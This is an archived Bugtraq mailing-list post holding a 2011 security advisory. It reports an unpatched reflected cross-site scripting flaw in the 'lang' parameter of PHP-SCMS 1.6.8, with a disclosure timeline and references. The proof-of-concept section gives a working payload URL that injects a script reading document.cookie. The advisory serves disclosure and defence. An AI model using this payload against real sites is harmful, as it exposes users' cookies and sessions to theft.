[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
PHP-SCMS 1.6.8 "lang" parameter XSS vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: PHP-SCMS 1.6.8 "lang" parameter XSS vulnerability
- From: sschurtz@xxxxxxxxxxx
- Date: Wed, 14 Dec 2011 18:48:48 GMT
Advisory: PHP-SCMS 1.6.8 "lang" parameter XSS vulnerability
Advisory ID: SSCHADV2011-035
Author: Stefan Schurtz
Affected Software: Successfully tested on PHP-SCMS 1.6.8
Vendor URL: http://php-scms.sourceforge.net/
Vendor Status: unpatched (no vendor feedback)
==========================
Vulnerability Description
==========================
PHP-SCMS "lang" parameter is prone to a XSS vulnerability
==================
PoC-Exploit
==================
http://<target>/scms/index.php?lang='"</script><script>alert(document.cookie)</script>
=========
Solution
=========
unpatched
====================
Disclosure Timeline
====================
08-Nov-2011 - Secunia SVCRP (vuln@xxxxxxxxxxx)
14-Dec-2011 - no vendor feedback
14-Dec-2011 - release date of this security advisory
========
Credits
========
Vulnerability found and advisory written by Stefan Schurtz.
===========
References
===========
http://secunia.com/advisories/46766/
http://www.rul3z.de/advisories/SSCHADV2011-035.txt